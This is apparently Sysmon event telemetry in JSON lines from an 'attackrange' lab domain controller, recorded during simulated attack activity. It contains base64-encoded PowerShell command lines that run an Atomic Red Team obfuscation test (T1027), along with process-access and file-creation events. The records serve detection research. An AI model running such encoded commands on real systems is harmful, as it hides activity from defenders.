{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4889,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.593\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-001056960700}\r\nSourceProcessId: 2580\r\nSourceThreadId: 4128\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0324-5F25-0000-0010B6BD0700}\r\nTargetProcessId: 2268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.593","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-001056960700}","SourceProcessId":"2580","SourceThreadId":"4128","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0324-5F25-0000-0010B6BD0700}","TargetProcessId":"2268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4890,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:36.593\r\nProcessGuid: {A837DB8D-0324-5F25-0000-0010C9B90700}\r\nProcessId: 2984\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\wxerclml.dll\r\nCreationUtcTime: 2020-08-01 05:52:36.484","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:36.593","ProcessGuid":"{A837DB8D-0324-5F25-0000-0010C9B90700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\wxerclml.dll","CreationUtcTime":"2020-08-01 05:52:36.484","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4891,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.624\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.624","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4892,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.624\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.624","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4893,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.624\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.624","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4894,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.828\r\nProcessGuid: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nProcessId: 4984\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0323-5F25-0000-0020A2950700}\r\nLogonId: 0x795A2\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-0323-5F25-0000-001016A60700}\r\nParentProcessId: 3396\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.828","ProcessGuid":"{A837DB8D-0324-5F25-0000-00100DC10700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0323-5F25-0000-0020A2950700}","LogonId":"0x795a2","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-0323-5F25-0000-001016A60700}","ParentProcessId":"3396","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4895,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.828\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-001016A60700}\r\nSourceProcessId: 3396\r\nSourceThreadId: 1440\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nTargetProcessId: 4984\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44538890)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.828","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-001016A60700}","SourceProcessId":"3396","SourceThreadId":"1440","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0324-5F25-0000-00100DC10700}","TargetProcessId":"4984","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44538890)","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4896,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.828\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nTargetProcessId: 4984\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.828","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0324-5F25-0000-00100DC10700}","TargetProcessId":"4984","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
